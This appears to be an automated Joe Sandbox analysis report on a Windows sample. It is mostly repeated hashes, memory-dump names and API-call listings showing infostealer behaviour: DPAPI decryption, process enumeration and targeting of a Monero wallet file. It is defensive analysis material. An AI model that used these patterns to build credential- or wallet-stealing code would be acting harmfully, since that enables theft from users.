                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 4vo]$7F>$:i}$y]>$1\m$wv
                              • API String ID: 0-225797793
                              • Opcode ID: 904022cd621318394efb4d5d97dea4fdf658dabd78f1d6d8b1c1456010eef188
                              • Instruction ID: 82c1caf2f60e30e77422d8ca36514867932ecbcaa68518d0587bfad6a3944f82
                              • Opcode Fuzzy Hash: 904022cd621318394efb4d5d97dea4fdf658dabd78f1d6d8b1c1456010eef188
                              • Instruction Fuzzy Hash: 94B228F3A0C2009FE714AE2DEC8577ABBE9EF94720F16453DEAC4C3744EA3558058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Eq?$Rn$qN$s6K]${o${o
                              • API String ID: 0-526785264
                              • Opcode ID: 2b09b8bfa018570ba99da5aeb58c13143ce329952a37f0b16eba8b69fee20031
                              • Instruction ID: 4777eb436c17f501555430fd572c73ed499cf4dce5303d3d171a636901127ee3
                              • Opcode Fuzzy Hash: 2b09b8bfa018570ba99da5aeb58c13143ce329952a37f0b16eba8b69fee20031
                              • Instruction Fuzzy Hash: BFB2F6F350C2049FE3046E2DEC8566AFBE5EF94720F1A4A3DEAC4C7740EA3598458697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: "/s?$*;u2$5}w$<E{o$oJ_
                              • API String ID: 0-128284979
                              • Opcode ID: 2f68e0914e3b996acdef83e6071e92247e7192d0ab40851361a328386fb3a01b
                              • Instruction ID: 6dba4217b21377ff1bec6a179060adf7e2eb73a8f8e7ad7ba3b5b8412201ad93
                              • Opcode Fuzzy Hash: 2f68e0914e3b996acdef83e6071e92247e7192d0ab40851361a328386fb3a01b
                              • Instruction Fuzzy Hash: 19B24AF3A082149FE3046E2DEC8567AFBE9EF94760F1A453DEAC4C3744EA3558018697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 1<}}$4)m$]T;$X}$v'p
                              • API String ID: 0-382648321
                              • Opcode ID: ffb2f6d981fad61ea22b4b291b9b242762dc393dafaef3644a68086c0148b143
                              • Instruction ID: 22a29060ab62913aa4a6a4377869d9d6d58f32af2a1210a4f40f3d193acf2670
                              • Opcode Fuzzy Hash: ffb2f6d981fad61ea22b4b291b9b242762dc393dafaef3644a68086c0148b143
                              • Instruction Fuzzy Hash: E8B214F3A0C2049FD304AE2DEC8567AFBE5EF94720F1A493DEAC4C3744EA3558458696
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FBC871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FBC87C
                              • lstrcat.KERNEL32(?,00FD0B46), ref: 00FBC943
                              • lstrcat.KERNEL32(?,00FD0B47), ref: 00FBC957
                              • lstrcat.KERNEL32(?,00FD0B4E), ref: 00FBC978
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 01c1fb178052c677d16e955f9fd398a472f440a8fefa07f97611959db5614b75
                              • Instruction ID: 675f5db9446f6426f40c6db508efbd4dc9fca69b107a0f377c83bbbfa20fed94
                              • Opcode Fuzzy Hash: 01c1fb178052c677d16e955f9fd398a472f440a8fefa07f97611959db5614b75
                              • Instruction Fuzzy Hash: E2417175D0420ADBDB20CF90DD89BEEBBB8BF88304F1041B9E509A7280D7749A84DF91
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00FB724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FB7254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00FB7281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00FB72A4
                              • LocalFree.KERNEL32(?), ref: 00FB72AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 71e09781061a4e346e8456f0d44ed4e74e3402459b9def2b70cf9c12c13d6176
                              • Instruction ID: e7c542d191b2898de9605e982c11592a1c691215e9eb307f2e048b10f19fe62b
                              • Opcode Fuzzy Hash: 71e09781061a4e346e8456f0d44ed4e74e3402459b9def2b70cf9c12c13d6176
                              • Instruction Fuzzy Hash: 65015275A40308BBDB24DFE4DD45F9D7778EF44701F104159FB19AB2C4DAB4AA408B64
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FC961E
                              • Process32First.KERNEL32(00FD0ACA,00000128), ref: 00FC9632
                              • Process32Next.KERNEL32(00FD0ACA,00000128), ref: 00FC9647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 00FC965C
                              • CloseHandle.KERNEL32(00FD0ACA), ref: 00FC967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 7f44269e10ed3b0ab940505b458dbd5ba855465d623b0d847ff951e60ced9ca6
                              • Instruction ID: 2a1b4fdfe3a22b0fea30344e43cef9773ff42b57406fa0802fea41eaaec0a435
                              • Opcode Fuzzy Hash: 7f44269e10ed3b0ab940505b458dbd5ba855465d623b0d847ff951e60ced9ca6
                              • Instruction Fuzzy Hash: F6014C75A00208EBCB24DFA5D959FEDB7F8EF48311F00419CA90A97280D7B4AB80EF50
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !:3g$dN?$dN?$.;
                              • API String ID: 0-2411466353
                              • Opcode ID: bb4baee833f543e95317a6667ae0029326181794bae77e1b9a3f3d8b3d1eab4a
                              • Instruction ID: 60eb40c667db1159706613270905cda1ce045f2cefe494b0ce1b970f4fe0e1d9
                              • Opcode Fuzzy Hash: bb4baee833f543e95317a6667ae0029326181794bae77e1b9a3f3d8b3d1eab4a
                              • Instruction Fuzzy Hash: 337216F3A08214AFE3046E2DEC8567AFBE9EF94720F1A453DEAC4C3740E63558058796
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00FD05B7), ref: 00FC86CA
                              • Process32First.KERNEL32(?,00000128), ref: 00FC86DE
                              • Process32Next.KERNEL32(?,00000128), ref: 00FC86F3
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • CloseHandle.KERNEL32(?), ref: 00FC8761
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 7c6c3a031851d35ee35f95768aeaabf4e3bac273284f4a17499cc39357bb0efd
                              • Instruction ID: 5e5781529e2dbe2cdce7b9a13b4980cf18417f2c148f965ff3ebe1465273fbeb
                              • Opcode Fuzzy Hash: 7c6c3a031851d35ee35f95768aeaabf4e3bac273284f4a17499cc39357bb0efd
                              • Instruction Fuzzy Hash: 3E315971901219ABCB24DB50DE46FEEB778EF44704F1041ADA50AA2190EF386E45DFA1
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00FB5184,40000001,00000000,00000000,?,00FB5184), ref: 00FC8EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: bc43851ab988e762f10f4ec06be2c4f45724654ab06eed911bc0ad8938c6edc4
                              • Instruction ID: 46bec3d33c7fe7e9c271538e0cf902a72a98bcb639d198b252cb859ac849db4a
                              • Opcode Fuzzy Hash: bc43851ab988e762f10f4ec06be2c4f45724654ab06eed911bc0ad8938c6edc4
                              • Instruction Fuzzy Hash: 08111C71200206BFDB04CFA4E996FA737A9AF89755F10945CF919CB240DB75EC82EB60
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9B2A
                              • LocalFree.KERNEL32(?,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 944177e60116a878dbdee1fb2e4cb638177bd0972e9663fbf71992ede0d5eb4b
                              • Instruction ID: 82f8e0466e02146078c0a395dc1ffbff9bc7ee27db2dd1231eed1e5fb243fe1b
                              • Opcode Fuzzy Hash: 944177e60116a878dbdee1fb2e4cb638177bd0972e9663fbf71992ede0d5eb4b
                              • Instruction Fuzzy Hash: 5411D4B4640308AFEB14CF64D895FAA77B5FB89711F208058FA199B384C7B5AA41DB50
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00FD0E00,00000000,?), ref: 00FC79B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC79B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00FD0E00,00000000,?), ref: 00FC79C4
                              • wsprintfA.USER32 ref: 00FC79F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 9edfeadedf7116bbb71736a5ec7140ddbb1ba25c7b5ceca93f5c8c42119600b6
                              • Instruction ID: abb2522baa352b03ee18435a3ddb9ff8751aee81601f36bf2160db9f20d04bbc
                              • Opcode Fuzzy Hash: 9edfeadedf7116bbb71736a5ec7140ddbb1ba25c7b5ceca93f5c8c42119600b6
                              • Instruction Fuzzy Hash: 5F1118B2904118ABCB149FC9E945BBEB7F8FB48B12F10411EF615A2284E27D5940DBB0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00DEDE48,00000000,?,00FD0E10,00000000,?,00000000,00000000), ref: 00FC7A63
